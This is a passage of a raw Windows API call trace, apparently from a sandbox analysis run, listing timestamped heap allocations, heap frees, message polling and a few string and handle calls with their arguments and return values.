hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0242.795] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.795] CryptReleaseContext (hProv=0xad2a50, dwFlags=0x0) returned 1 [0242.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0242.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7a8 [0242.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0242.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0242.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0242.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0242.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0242.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0242.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0242.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0242.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0242.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0242.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0242.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0242.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0242.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0242.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0242.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0242.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0242.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0242.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0242.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0242.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0242.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0242.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0242.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0242.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0242.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0242.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0242.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0242.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0242.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0242.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0242.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0242.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0242.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0242.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0242.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0242.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0242.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0242.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0242.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0242.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0242.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0242.797] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0242.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0242.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0242.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0242.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0242.798] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0242.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0242.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0242.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0242.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0242.798] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0242.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0242.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0242.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0242.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0242.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0242.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0242.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0242.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0242.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0242.799] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0242.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0242.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0242.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0242.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0242.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0242.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0242.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0242.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0242.799] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0242.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0242.799] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0242.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0242.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0242.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0242.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0242.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0242.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0242.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0242.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0242.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0242.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0242.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0242.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0242.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0242.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0242.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0242.800] FreeLibrary (hLibModule=0x74d40000) returned 1 [0242.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0242.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0242.800] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0242.800] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0242.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0242.800] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0242.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0242.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0242.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0242.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0242.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0242.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0242.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0242.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0242.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0242.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0242.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0242.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0242.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0242.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0242.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0242.801] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0242.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0242.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0242.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0242.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0242.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0242.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0242.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0242.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0242.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0242.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0242.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0242.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0242.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0242.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0242.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0242.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0242.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7a8 [0242.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaf0 [0242.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0242.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0242.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa970 [0242.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0242.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0242.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0242.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0242.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0242.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0242.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0242.803] CloseHandle (hObject=0x268) returned 1 [0242.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0242.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0242.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0242.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0242.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0242.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0242.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0242.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0242.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0242.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0242.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0242.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0242.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0242.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0242.804] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0242.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0242.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0242.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0242.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0242.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0242.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0242.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0242.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0242.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0242.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0242.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0242.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0242.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0242.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0242.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0242.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0242.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0242.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0242.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0242.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0242.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0242.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0242.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0242.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0242.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0242.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0242.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0242.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0242.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0242.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0242.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0242.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0242.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0242.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0242.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0242.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0242.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0242.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0242.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0242.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0242.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0242.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0242.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0242.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0242.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0242.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0242.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0242.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0242.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0242.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0242.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0242.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0242.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0242.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0242.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0242.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0242.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0242.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0242.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: 